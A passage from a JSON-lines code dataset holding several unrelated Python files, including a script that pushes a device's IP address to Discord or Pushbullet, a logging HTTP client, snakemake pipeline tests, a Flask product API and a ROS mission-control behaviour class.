args.logfile)\r\n","sub_path":"pyke/keprange.py","file_name":"keprange.py","file_ext":"py","file_size_in_byte":15979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"292550152","text":"#!/usr/bin/env python3\n\"\"\"A IP pushing tool for headless devices with ephemeral ip addresses. \nPushes IPs to Discord or Pushbullet.\n\n\nUsage:\n get_ip_addr.py discord (-t | --token=) (-i | --id=)\n get_ip_addr.py pushbullet (-t | --token=)\n get_ip_addr.py (-c | --config=)\n get_ip_addr.py\n\n\nOptions:\n -t , --token= token for discord or pushbullet\n -i , --id= id for discord\n -c , --config= [default: /etc/ip-pusher.json]\n\n\n\"\"\"\n\n\nimport os\nimport json\nimport requests\nfrom docopt import docopt\n\n\ndef get_config():\n args = docopt(__doc__, version='0.1.0')\n print(args)\n if not args['discord'] and not args['pushbullet']:\n config = load_json_config(args['--config'])\n args[config['type']] = True\n args['--id'] = config['id']\n args['--token'] = config['token']\n return args\n\n\ndef load_json_config(path):\n c = {}\n if os.path.exists(path):\n try:\n with open(path) as f:\n c = json.load(f)\n except Exception as e:\n print(\"File error\", e)\n exit(1)\n else:\n print(\"No config. Edit config at\", path)\n exit(1)\n \n return c\n\n\ndef get_ip():\n r = requests.get('http://ip.42.pl/raw')\n if r.status_code == 200:\n return r.text\n else:\n os.exit(1)\n return ''\n\n\ndef send_discord(webh_id, token, msg):\n d_url = 'https://discordapp.com/api/webhooks/{}/{}'.format(webh_id, token)\n d_data = { 'content': msg }\n res = requests.post(d_url, json=d_data)\n res.raise_for_status()\n\n\ndef send_pushbullet(token, title, msg):\n pb_url = 'https://api.pushbullet.com/v2/pushes'\n pb_data = { 'type': 'note', 'title': title, 'body': msg } \n res = requests.post(pb_url, json=pb_data, headers={'Access-Token': token})\n res.raise_for_status()\n\n\ndef main():\n config = get_config()\n host = os.uname()[1]\n ip = get_ip()\n title = \"IP from \\\"{}\\\"\".format(host)\n msg = \"IP : {}\\nDomain (TTL in 5m): {}.jackhil.de\".format(ip, host)\n\n if config['pushbullet']:\n send_pushbullet(config['--token'], title, msg)\n elif config['discord']:\n send_discord(config['--id'], config['--token'], msg)\n else:\n print(\"No configured sender\")\n exit(1)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"get_ip_addr.py","file_name":"get_ip_addr.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"93100095","text":"filters = [\n [\n \"10m_u_component_of_wind\",\n \"10m u component of wind\"\n ],\n [\n \"10m_v_component_of_wind\",\n \"10m v component of wind\"\n ],\n [\n \"2m_dewpoint_temperature\",\n \"2m dewpoint temperature\"\n ],\n [\n \"2m_temperature\",\n \"2m temperature\"\n ],\n [\n \"mean_sea_level_pressure\",\n \"Mean sea level pressure\"\n ],\n [\n \"mean_wave_direction\",\n \"Mean wave direction\"\n ],\n [\n \"mean_wave_period\",\n \"Mean wave period\"\n ],\n [\n \"sea_surface_temperature\",\n \"Sea surface temperature\"\n ],\n [\n \"significant_height_of_combined_wind_waves_and_swell\",\n \"Significant height of combined wind waves and swell\"\n ],\n [\n \"surface_pressure\",\n \"Surface pressure\"\n ],\n [\n \"total_precipitation\",\n \"Total precipitation\"\n ]\n]\n","sub_path":"canvas/constants/reanalysis_era5_single_levels/partials/popular.py","file_name":"popular.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"289047210","text":"# -*- coding:utf-8 _*-\n\"\"\" \n@author:mongo\n@time: 2018/12/17 \n@email:3126972006@qq.com\n@function: \n\"\"\"\n\n# 正则表达式完成字符串的查找\n# s1 = 'world hello'\n# pattern = 'hello' # 正则表达式\n# res = re.match(pattern=pattern, string=s1) # 最开始位置查找,找到则返回一个match对象,无则返回None\n# match3 = re.search(pattern=pattern, string=s1) # 任意位置找,找到则返回一个match对象,无则返回None\n# print(match3)\n# res1 = re.findall(pattern=pattern, string=s1) # 查找全部匹配字符串,并且将查找到的匹配字符放到一个列表里面\n# print(res1)\n# # 变量名#\ns = '{\"mobilephone\":\"${normal_user}\",\"pwd\":\"${pwd}\"}'\n\n# # 目标字符串\n# res4 = re.findall(pattern='(\\d{11})',string=s)\n#\n# s1 = re.sub('\\$\\{(.*?)\\}','123456',s)\n# print(s1)\n#\n# res5 = re.search(pattern='\\$\\{(.*?)\\}', string=s)\n# print(res5.group(0), res5.group(1))\n#\n# # 正则表达式分组\n# s4 = 'www.lemonban.com'\n# p = '(w)(ww)' # ()进行分组\n# m = re.search(p,s4)\n# print(m)\n# print(m.group(0)) # 全匹配\n# print(m.group(1)) # 拿到第一个分组里面的字符\n# print(m.group(2)) # 拿到第二个分组里面的字符\n\n\nimport json\nimport re\n\n# 使��字典解析 解析-遍历-判断-统计\nwith open('loads.txt', 'r', encoding='utf-8') as fp: # 打开文件\n financelog = json.load(fp) # 文件对象序列化成字典\n datas = financelog['data'] # 获取data列表\n flag = 0\n for data in datas: # 遍历列表\n if data['status'] == '1': # 判断是否等于1\n flag += 1 # 统计status=1\n print(\"status=1 的条数为:\", flag)\n\n# 使用正则解析 匹配并查找\nfinancelog = open('loads.txt', 'r', encoding='utf-8').read() # 读取文件里面的内容并返回一个字符串\nstatus = re.findall('\"status\": \"1\"', financelog) # 匹配在目标字符串中查找\"status\": \"1\"的内容,放到一个列表里面\nprint(\"status=1 的条数为:\", len(status)) # 获取列表的长度就代表有多少条\"status\": \"1\"的数据\n\n\n#findall\ns = '{\"mobilephone\":\"${normal_user}\",\"pwd\":\"${pwd}\"}'\npattern = '\\$\\{(.*?)\\}'\nss = re.findall(pattern,s)\nprint(ss)\n\nre.sub(pattern,'aaa',s)\n","sub_path":"study_re.py","file_name":"study_re.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"473140692","text":"# Copyright 2015 Rackspace\n#\n# Original from OpenCafe (https://github.com/openstack/opencafe)\n#\n# Changes copyright 2016 Intel\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport logging\nfrom time import time\n\nimport requests\nfrom requests.packages import urllib3\nimport six\nurllib3.disable_warnings()\n\n\ndef _log_transaction(log, level=logging.DEBUG):\n \"\"\"Decorator used for logging requests/response in clients.\n\n Takes a python Logger object and an optional logging level.\n \"\"\"\n\n def _safe_decode(text, incoming='utf-8', errors='replace'):\n \"\"\"Decodes incoming text/bytes using `incoming` if not already unicode.\n\n :param incoming: Text's current encoding\n :param errors: Errors handling policy. See here for valid\n values http://docs.python.org/2/library/codecs.html\n\n :returns: text or a unicode `incoming` encoded\n representation of it.\n \"\"\"\n\n if isinstance(text, six.text_type):\n return text\n\n return text.decode(incoming, errors)\n\n def _decorator(func):\n \"\"\"Accepts a function and returns wrapped version of that function.\"\"\"\n def _wrapper(*args, **kwargs):\n \"\"\"Logging wrapper for any method that returns a requests response.\n\n Logs requestslib response objects, and the args and kwargs\n sent to the request() method, to the provided log at the provided\n log level.\n \"\"\"\n\n logline = '{0} {1}'.format(args, kwargs)\n\n try:\n log.debug(_safe_decode(logline))\n except Exception as exception:\n # Ignore all exceptions that happen in logging, then log them\n log.info(\n 'Exception occured while logging signature of calling'\n 'method in http client')\n log.exception(exception)\n\n # Make the request and time it's execution\n response = None\n elapsed = None\n try:\n start = time()\n response = func(*args, **kwargs)\n elapsed = time() - start\n except Exception as exception:\n log.critical('Call to Requests failed due to exception')\n log.exception(exception)\n raise exception\n\n # requests lib 1.0.0 renamed body to data in the request object\n request_body = ''\n if 'body' in dir(response.request):\n request_body = response.request.body\n elif 'data' in dir(response.request):\n request_body = response.request.data\n else:\n log.info(\n \"Unable to log request body, neither a 'data' nor a \"\n \"'body' object could be found\")\n\n # requests lib 1.0.4 removed params from response.request\n request_params = ''\n request_url = response.request.url\n if 'params' in dir(response.request):\n request_params = response.request.params\n elif '?' in request_url:\n request_url, request_params = request_url.split('?')\n\n logline = ''.join([\n '\\n{0}\\nREQUEST SENT\\n{0}\\n'.format('-' * 12),\n 'request method..: {0}\\n'.format(response.request.method),\n 'request url.....: {0}\\n'.format(request_url),\n 'request params..: {0}\\n'.format(request_params),\n 'request headers.: {0}\\n'.format(response.request.headers),\n 'request body....: {0}\\n'.format(request_body)])\n try:\n log.log(level, _safe_decode(logline))\n except Exception as exception:\n # Ignore all exceptions that happen in logging, then log them\n log.log(level, '\\n{0}\\nREQUEST INFO\\n{0}\\n'.format('-' * 12))\n log.exception(exception)\n\n logline = ''.join([\n '\\n{0}\\nRESPONSE RECEIVED\\n{0}\\n'.format('-' * 17),\n 'response status..: {0}\\n'.format(response),\n 'response time....: {0}\\n'.format(elapsed),\n 'response headers.: {0}\\n'.format(response.headers),\n 'response body....: {0}\\n'.format(response.content),\n '-' * 79])\n try:\n log.log(level, _safe_decode(logline))\n except Exception as exception:\n # Ignore all exceptions that happen in logging, then log them\n log.log(level, '\\n{0}\\nRESPONSE INFO\\n{0}\\n'.format('-' * 13))\n log.exception(exception)\n return response\n return _wrapper\n return _decorator\n\n\nclass HTTPClient(object):\n\n \"\"\"Allows clients to inherit requests.request.\n\n @summary: Redefines request() so that keyword args are passed.\n The parameters are passed through a named dictionary\n instead of kwargs. Client methods can then take parameters\n that may overload request parameters, which allows client\n method calls to override parts of the request with parameters\n sent directly to requests, overriding the client method logic\n either in part or whole on the fly.\n\n \"\"\"\n\n _log = logging.getLogger(__name__)\n\n def __init__(self):\n self.default_headers = {}\n\n @_log_transaction(log=_log)\n def request(\n self, method, url, headers=None, params=None, data=None,\n requestslib_kwargs=None):\n\n # set requestslib_kwargs to an empty dict if None\n requestslib_kwargs = requestslib_kwargs if (\n requestslib_kwargs is not None) else {}\n\n # Set defaults\n params = params if params is not None else {}\n verify = False\n\n # If headers are provided by both, headers \"wins\" over default_headers\n headers = dict(self.default_headers, **(headers or {}))\n\n # Override url if present in requestslib_kwargs\n if 'url' in list(requestslib_kwargs.keys()):\n url = requestslib_kwargs.get('url', None) or url\n del requestslib_kwargs['url']\n\n # Override method if present in requestslib_kwargs\n if 'method' in list(requestslib_kwargs.keys()):\n method = requestslib_kwargs.get('method', None) or method\n del requestslib_kwargs['method']\n\n # The requests lib already removes None key/value pairs, but we force\n # it here in case that behavior ever changes\n for key in list(requestslib_kwargs.keys()):\n if requestslib_kwargs[key] is None:\n del requestslib_kwargs[key]\n\n # Create the final parameters for the call to the base request()\n # Wherever a parameter is provided both by the calling method AND\n # the requests_lib kwargs dictionary, requestslib_kwargs \"wins\"\n requestslib_kwargs = dict(\n {'headers': headers, 'params': params, 'verify': verify,\n 'data': data}, **requestslib_kwargs)\n\n # Make the request\n return requests.request(\n method, url, **requestslib_kwargs)\n","sub_path":"syntribos/clients/http/base_http_client.py","file_name":"base_http_client.py","file_ext":"py","file_size_in_byte":7611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"311599364","text":"\"\"\"\nthenif2.py\n\nNeed to perform the second comparison only if the first comparison was true.\n(If the first comparison was false, the second comparison would be a\nwaste of time.)\n\"\"\"\n\nimport sys\n\nreceipts = input(\"How much were our receipts? \")\nreceipts = int(receipts)\n\nexpenditures = input(\"How much were our expenditures? \")\nexpenditures = int(expenditures)\n\nprint() #Skip a line.\n\nif receipts <= expenditures:\n print(\"We're not making any money.\")\n if receipts < expenditures:\n print(\"In fact, we're losing money.\")\n\nsys.exit(0)\n","sub_path":"thenif2.py","file_name":"thenif2.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"368414306","text":"from options.test_options import TestOptions\nfrom data import DataLoader\nfrom models import create_model\nfrom util.writer import Writer\nfrom models.layers import mesh_prepare\nimport os\nimport numpy as np\n\ndef add_adverserial_examples(dataset):\n #dataset.dataset.paths = []\n return\n\ndef run_test(epoch=-1, vertices = None, faces= None, label= None, attack = False):\n print('Running Test')\n opt = TestOptions().parse()\n opt.serial_batches = True # no shuffle\n dataset = DataLoader(opt)\n model = create_model(opt)\n writer = Writer(opt)\n # test\n writer.reset_counter()\n for i, data in enumerate(dataset):\n if i==4 and attack == True:\n for i in range(4):\n attacked_data = mesh_prepare.rebuild_mesh(vertices, faces)\n #data['label'][0] = label\n data['edge_features'][-i-1] = attacked_data.features# data['mesh'][0].features\n model.set_input(data)\n ncorrect, nexamples = model.test()\n writer.update_counter(ncorrect, nexamples)\n writer.print_acc(epoch, writer.acc)\n return writer.acc\n\n\ndef extract_data_of_attacked_meshes(path_to_walker_meshes):\n paths = os.listdir(path_to_walker_meshes)\n paths_to_meshes = [path for path in paths if path.__contains__('_attacked')]\n\n for mesh_path in paths_to_meshes:\n orig_mesh_data = np.load(path_to_walker_meshes + mesh_path, encoding='latin1', allow_pickle=True)\n attacked_mesh_data = {k: v for k, v in orig_mesh_data.items()}\n vertices, faces, label = attacked_mesh_data['vertices'], attacked_mesh_data['faces'], attacked_mesh_data['label']\n run_test(vertices=vertices, faces=faces, label=label, attack=True)\n\nif __name__ == '__main__':\n extract_data_of_attacked_meshes(path_to_walker_meshes = 'datasets_processed/shrec11/')\n","sub_path":"adverserial_mesh/test_attacked_meshes.py","file_name":"test_attacked_meshes.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"360820653","text":"##################################################################\nfrom sys import stdin\n\nclass InputStream:\n def __init__(self, char_stream=None):\n # if no stream given read it from the terminal\n if not char_stream:\n char_stream = stdin.read()\n # turn char stream into a list of characters\n # ignoring any kind of white space\n clean_stream = char_stream.replace(' ','') \\\n .replace('\\t','') \\\n .replace('\\n','') \n self.stream = [c for c in clean_stream]\n self.stream.append('\\eof')\n self.stream_ix = 0\n\n def pointer(self):\n return self.stream[self.stream_ix]\n\n def next(self):\n if not self.end_of_file():\n self.stream_ix += 1\n return self.pointer()\n\n def match(self, sym):\n if sym == self.pointer():\n s = self.pointer()\n self.next()\n return s\n else:\n raise SyntaxError('unexpected symbol {} while parsing, expected {}'\n .format(self.stream[self.stream_ix], sym))\n\n def end_of_file(self):\n if self.pointer() == '\\eof':\n return True\n else:\n return False\n","sub_path":"chap02/example/inputstream.py","file_name":"inputstream.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"387907215","text":"def rysujWykres(x,y):\n for i in range(0,10):\n a=11-len(x[i])\n wartosc=int(y[i])//3\n print(' '*a+f'{x[i]}:',end=' ')\n print('#'*wartosc)\n \n \njezyki=['Java','Python','JavaScript','C++','C#','Ruby','Perl','PHP','C','Android']\nwartosci=[61,47,37,32,26,18,14,14,9,7]\n\nrysujWykres(jezyki,wartosci)","sub_path":"04-Subroutines/after class/28.py","file_name":"28.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"646314666","text":"# Unit tests for snakemake pipelines\n\n__author__ = \"dpark@broadinstitute.org\"\n\nimport util.cmd, util.file\nimport unittest, argparse\nimport sys, os, subprocess, shutil, tempfile, argparse, itertools\nfrom test import TestCaseWithTmp\n\nif sys.version_info>=(3,2):\n import snakemake\n\n\ndef setup_dummy_simple(\n sample_names=('G1234', 'G5678', 'G3671.1_r1', 'G3680-1_4',\n '9876', 'x.y-7b')):\n ''' Set up a very simple project directory with empty input files. '''\n \n workdir = tempfile.mkdtemp()\n os.mkdir(os.path.join(workdir, 'data'))\n os.mkdir(os.path.join(workdir, 'data', '00_raw'))\n os.mkdir(os.path.join(workdir, 'log'))\n os.mkdir(os.path.join(workdir, 'reports'))\n os.mkdir(os.path.join(workdir, 'tmp'))\n \n for s in sample_names:\n with open(os.path.join(workdir, 'data', '00_raw', s+'.bam'), 'wt') as outf:\n pass\n for fn in ('samples-assembly.txt', 'samples-depletion.txt',\n 'samples-runs.txt', 'samples-assembly-failures.txt'):\n with open(os.path.join(workdir, fn), 'wt') as outf:\n for s in sample_names:\n outf.write(s+'\\n')\n \n shutil.copy(os.path.join(util.file.get_project_path(),\n 'pipes', 'Snakefile'), workdir)\n shutil.copy(os.path.join(util.file.get_project_path(),\n 'pipes', 'config.json'), workdir)\n \n os.symlink(util.file.get_project_path(),\n os.path.join(workdir, 'bin'))\n \n return workdir\n\n\n@unittest.skipIf(sys.version_info<(3,2), \"python version is too old for snakemake\")\nclass TestSimpleDryRuns(TestCaseWithTmp):\n def setUp(self):\n super(TestSimpleDryRuns, self).setUp()\n self.workdir = setup_dummy_simple()\n self.env = {'GATK_PATH':os.environ.get('GATK_PATH'),\n 'NOVOALIGN_PATH':os.environ.get('NOVOALIGN_PATH')}\n def tearDown(self):\n for k,v in self.env.items():\n if v:\n os.environ[k] = v\n super(TestSimpleDryRuns, self).tearDown()\n\n def test_dryrun_all(self):\n ''' Test that the \"all\" rule dryruns properly '''\n self.assertTrue(snakemake.snakemake(\n os.path.join(self.workdir, 'Snakefile'),\n #configfile=os.path.join(self.workdir, 'config.json'),\n workdir=self.workdir, dryrun=True))\n self.assertTrue(snakemake.snakemake(\n os.path.join(self.workdir, 'Snakefile'),\n #configfile=os.path.join(self.workdir, 'config.json'),\n workdir=self.workdir, dryrun=True,\n targets=['all']))\n\n def test_dryrun_all_assemble(self):\n ''' Test that the \"all_assemble\" rule dryruns properly '''\n self.assertTrue(snakemake.snakemake(\n os.path.join(self.workdir, 'Snakefile'),\n #configfile=os.path.join(self.workdir, 'config.json'),\n workdir=self.workdir, dryrun=True,\n targets=['all_assemble']))\n\n def test_dryrun_all_deplete(self):\n ''' Test that the \"all_deplete\" rule dryruns properly '''\n self.assertTrue(snakemake.snakemake(\n os.path.join(self.workdir, 'Snakefile'),\n #configfile=os.path.join(self.workdir, 'config.json'),\n workdir=self.workdir, dryrun=True,\n targets=['all_deplete']))\n","sub_path":"test/unit/test_snake.py","file_name":"test_snake.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"452299076","text":"from flask import Flask, jsonify, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom datetime import datetime\nfrom sqlalchemy.sql import func\nfrom os import environ\n\napp = Flask(__name__)\n#app.config['SQLALCHEMY_DATABASE_URI'] = environ.get('dbURL')\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://root@localhost:3306/product_db'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///product_db.db'\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////product_db.db'\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nCORS(app)\n\n\nclass Product(db.Model):\n __tablename__ = 'product'\n id = db.Column(db.Integer, primary_key=True)\n image = db.Column(db.String(120), nullable=False)\n name = db.Column(db.String(120), nullable=False)\n category_id = db.Column(db.Integer, db.ForeignKey(\n 'category.id'), nullable=False)\n description = db.Column(db.String(1000), nullable=False)\n unit_price = db.Column(db.Float(10), nullable=False)\n quantity = db.Column(db.Integer, nullable=False)\n\n\n def json(self):\n return {\"id\": self.id, \"image\": self.image, \"name\": self.name, \"category_id\": self.category_id, \"description\": self.description,\n \"unit_price\": self.unit_price, \"quantity\": self.quantity}\n\n\nclass Category(db.Model):\n __tablename__ = 'category'\n id = db.Column(db.Integer, primary_key=True, nullable=False)\n name = db.Column(db.String(120), primary_key=True)\n\n \n products = db.relationship(\n 'Product', backref='products', lazy=True)\n\n def __init__(self, id, name):\n self.id = id\n self.name = name\n\n def json(self):\n return {\"id\": self.id, \"name\": self.name}\n\n\n# [GET] all products\n@app.route(\"/get_all_products\")\ndef get_all_products():\n products = [Product.json()\n for Product in Product.query.all()]\n if products:\n return_message = ({\"status\": \"success\",\n \"products\": products})\n else:\n return_message = ({\"status\": \"fail\"})\n return jsonify(return_message)\n\n# [GET] all categories\n@app.route(\"/get_all_categories\")\ndef get_all_categories():\n categories = [Category.json()\n for Category in Category.query.all()]\n if categories:\n return_message = ({\"status\": \"success\",\n \"categories\": categories})\n else:\n return_message = ({\"status\": \"fail\"})\n return jsonify(return_message)\n\n\n@app.route(\"/get_products_by_category/\")\ndef get_products_by_id():\n category_id = request.args.get('category_id')\n products = [Product.json()\n for Product in Product.query.filter_by(category_id=category_id).all()]\n if products:\n return_message = ({\"status\": \"success\",\n \"products\": products})\n else:\n return_message = ({\"status\": \"fail\"})\n return jsonify(return_message)\n\n\n@app.route(\"/get_category/\", methods=['GET'])\ndef get_category():\n category_id = request.args.get('category_id')\n category = Category.query.filter_by(id=category_id).first()\n if category:\n return_message = ({\"status\": \"success\",\n \"category\": category.json()})\n else:\n return_message = ({\"status\": \"fail\"})\n return jsonify(return_message)\n\n\n@app.route('/get_product/', methods=['GET'])\ndef get_product():\n product_id = request.args.get('product_id')\n product = Product.query.filter_by(id=product_id).first()\n if product:\n return_message = ({\"status\": \"success\",\n \"product\": product.json()})\n else:\n return_message = ({\"status\": \"fail\"})\n return jsonify(return_message)\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5001, debug=True)\n","sub_path":"product/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"514812151","text":"import rospy\nimport smach\nimport smach_ros\nimport time\nimport imp\nimport uuid\nimport subprocess\nimport signal\nimport os\nimport mission_control_utils\nfrom mission_control_utils_constants import Constants\nfrom mission_control_utils_cache import Cache\nfrom std_msgs.msg import Int32\nfrom std_msgs.msg import String\nfrom mission_control.msg import Variable\nfrom mission_control.msg import Answer\nfrom mission_control.msg import Health\n\nclass Behaviour:\n\n TOKEN_REQUEST_TOPIC = \"/mission_control/token/request\"\n \"\"\"string: token request topic name\"\"\"\n\n TOKEN_RELEASE_TOPIC = \"/mission_control/token/release\"\n \"\"\"string: token release topic name\"\"\"\n\n TOKEN_ASK_TOPIC = \"/mission_control/token/ask\"\n \"\"\"string: token ask topic name\"\"\"\n\n TOKEN_ANSWER_TOPIC = \"/mission_control/token/answer\"\n \"\"\"string: token answer topic\"\"\"\n\n WATCHDOG_OK_TOPIC = \"/mission_control/watchdog/ok\"\n \"\"\"string: watchdog ok topic name\"\"\"\n\n MAX_TOKEN_ASK_TIMES = 2\n \"\"\"int: how many times node will ask for token on startup\"\"\"\n\n MAX_VAR_SEARCH_RECURSION = 10\n\n _token_ask_times = 0\n \"\"\"int: how many times node has asked for token on startup\"\"\"\n\n _answer_false_gotten = False\n \"\"\"bool: indicates whether node has been denied for startup token for even once\"\"\"\n\n _answer = True\n \"\"\"bool: indicates whether node has the right to acquire token on startup.\n It is initialized to True, to solve the problem when only one node exists.\n \"\"\"\n\n _priority = 0\n \"\"\"int: node's priority. The lower the number the higher the priority\n\n Available values: 1..N\n \"\"\"\n\n _active_str = \"False\"\n \"\"\"string: after evaluation shows if the node is active or not \"\"\"\n\n _token = False\n \"\"\"bool: shows if other initialized nodes have given this node permission to work\"\"\"\n\n _paused = False\n \"\"\"bool: shows if state machine's work is paused or not\"\"\"\n\n _running = False\n \"\"\"bool: shows if the state machine is active or not\"\"\"\n\n _process = False\n \"\"\"subprocess.Popen: subprocess where script will be executed \"\"\"\n\n _script = ''\n \"\"\"string: script's full path, that will be executed \"\"\"\n\n _cache = {}\n \"\"\"dict: all the variables that node uses from state machines are stored here\"\"\"\n\n _var_ttl = {}\n \"\"\"dict: holds variables time to live in seconds\"\"\"\n\n _var_last_upt = {}\n \"\"\"dict: holds the info when the variable was last set\"\"\"\n\n _vars_from_own_proc = {}\n \"\"\"dict: holds all the variables that the child process set\"\"\"\n\n explored = []\n \"\"\"list: all the objects in child python script that have been searched for variables\"\"\"\n\n types = []\n \"\"\"list: all user defined class types that are in child python script\"\"\"\n\n _debug_level = 0\n \"\"\"int: node's debug level between 0..3 . 0 - lowest level, 3 - highest level\"\"\"\n\n request_pub = rospy.Publisher(TOKEN_REQUEST_TOPIC, Int32, queue_size=Constants.QUEUE_SIZE)\n \"\"\"rospy.Publisher: token request publisher\"\"\"\n\n release_pub = rospy.Publisher(TOKEN_RELEASE_TOPIC, Int32, queue_size=Constants.QUEUE_SIZE)\n \"\"\"rospy.Publisher: token release publisher\"\"\"\n\n ok_pub = rospy.Publisher(WATCHDOG_OK_TOPIC, Health, queue_size=Constants.QUEUE_SIZE)\n \"\"\"rospy.Publisher: watchdog ok publisher\"\"\"\n\n ask_pub = rospy.Publisher(TOKEN_ASK_TOPIC, Int32, queue_size=Constants.QUEUE_SIZE)\n \"\"\"rospy.Publisher: startup token ask publisher\"\"\"\n\n answer_pub = rospy.Publisher(TOKEN_ANSWER_TOPIC, Answer, queue_size=Constants.QUEUE_SIZE)\n \"\"\"rospy.Publisher: startup token answer publisher\"\"\"\n\n def __init__(self):\n\n Cache.parent_node_name = rospy.get_name()\n\n self.subscribe_to_topics()\n\n def set_debug_level(self, debug_level):\n \"\"\" Sets node's debug level\n\n Args:\n debug_level (int): debug level\n \"\"\"\n\n if debug_level < 0:\n debug_level = 0\n elif debug_level > 3:\n debug_level = 3\n\n Cache.debug_level = debug_level\n self._debug_level = debug_level\n\n def set_priority(self, prio):\n \"\"\" Sets node's priority \n\n Args:\n prio (int): priority number\n \"\"\"\n\n if prio < 1:\n self._priority = 1\n else:\n self._priority = prio\n\n def set_executable(self, file):\n \"\"\" Sets executable script \n \n Args:\n file (string): file's name, that will be executed\n \"\"\"\n self._script = file\n\n return True\n\n def subscribe_to_topics(self):\n \"\"\" Subscribes to all ROS topics \"\"\"\n\n rospy.Subscriber(self.TOKEN_REQUEST_TOPIC, Int32, self.request_token_cb)\n rospy.Subscriber(self.TOKEN_RELEASE_TOPIC, Int32, self.release_token_cb)\n\n rospy.Subscriber(self.TOKEN_ASK_TOPIC, Int32, self.ask_token_cb)\n rospy.Subscriber(self.TOKEN_ANSWER_TOPIC, Answer, self.answer_token_cb)\n\n rospy.Subscriber(Constants.VAR_SET_TOPIC, Variable, self.set_variable_cb)\n rospy.Subscriber(Constants.VAR_GET_TOPIC, String, self.get_variable_cb)\n \n\n def set_active(self, active_str):\n \"\"\" Sets string that is later evaluated to boolean value which shows whether the node should be active\n\n Args:\n active_str (string): string that will be evaluated\n \"\"\"\n\n if active_str != \"\":\n self._active_str = active_str\n\n def is_active(self):\n \"\"\" Return boolean value which shows whether the node is active or not \"\"\"\n\n active = eval(self._active_str)\n\n self.write_debug(\"Activate string \" + self._active_str + \" evaluates to \" + str(active), 3)\n\n return active\n\n def request_token(self):\n \"\"\" Sends out token request message \"\"\"\n\n self.request_pub.publish(self._priority)\n\n self.write_debug(\"Requesting token\", 2)\n\n def release_token(self, rel_prio):\n \"\"\" Releases held token\n\n If necessary pauses the current state machine\n\n Args:\n rel_prio (int): indicates to which priority token is released to\n \"\"\"\n\n if self.is_active():\n self.pause_behaviour()\n\n self._token = False\n self.release_pub.publish(rel_prio)\n\n self.write_debug(\"Releasing token to priority \" + str(rel_prio), 2)\n\n def ask_token(self):\n \"\"\"Asks for token on startup\n This is different from token request because token is asked on startup and nobody has token at startup.\n On startup token is given to node which has the highest priority.\n If some node asks for token when somebody alrady has token, false is returned despite its priority.\n\n Returns:\n bool: True if node is allowed to ask token again, False otherwise\n \"\"\"\n\n if self._token_ask_times > self.MAX_TOKEN_ASK_TIMES:\n return False\n\n if self._token_ask_times == self.MAX_TOKEN_ASK_TIMES:\n if self._answer_false_gotten:\n self._token = False\n self.write_debug(\"Got False atleast at once on asking token\", 2)\n else:\n self._token = self._answer\n self.write_debug(\"Got answer \" + str(self._answer) + \" when asking token on startup\", 2)\n\n self._token_ask_times += 1\n\n return False\n\n if not self._answer_false_gotten:\n self.ask_pub.publish(self._priority)\n\n self._token_ask_times += 1\n\n self.write_debug(\"Asking token on startup (\" + str(self._token_ask_times) + \"/\" + str(self.MAX_TOKEN_ASK_TIMES) + \")\", 3)\n\n return True\n\n def answer_token_cb(self, data):\n \"\"\" Deals with incoming token answer message\n\n If node has been given false as an answer even once, it has no chance to acquire token on startup\n\n Args:\n data (mission_control.msg.Answer): data.priority shows node's priority to which this answer is meant to ,\n data.answer is the answer given to node\n \"\"\"\n\n if self._priority == data.priority and not self._answer_false_gotten:\n self._answer = data.answer\n\n if not self._answer:\n self._answer_false_gotten = True\n\n def ask_token_cb(self, data):\n \"\"\"Deals with incoming token ask message\n\n If node's priority, who asked, is higher or equal than the node's from who it's being asked, permission to acquire node is given.\n If node's priority is lower, permission to acquire node is denied\n\n If node, from who the token permission is asked, owns the token, permission to acquire node is denied\n \"\"\"\n\n if data.data == self._priority:\n return\n\n msg = Answer()\n msg.priority = data.data\n\n if self._token or self._priority < data.data:\n msg.answer = False\n else: \n msg.answer = True\n\n self.write_debug(\"Priority \" + str(data.data) + \" asked for token, got answer \" + str(msg.answer), 3)\n\n self.answer_pub.publish(msg)\n\n def request_token_cb(self, data):\n \"\"\" Deals with incoming token request message\n\n Args:\n data (std_msgs.msg.Int32): priority number of the node who requested token\n \"\"\"\n \n if self._token and (data.data < self._priority or not self.is_active()):\n 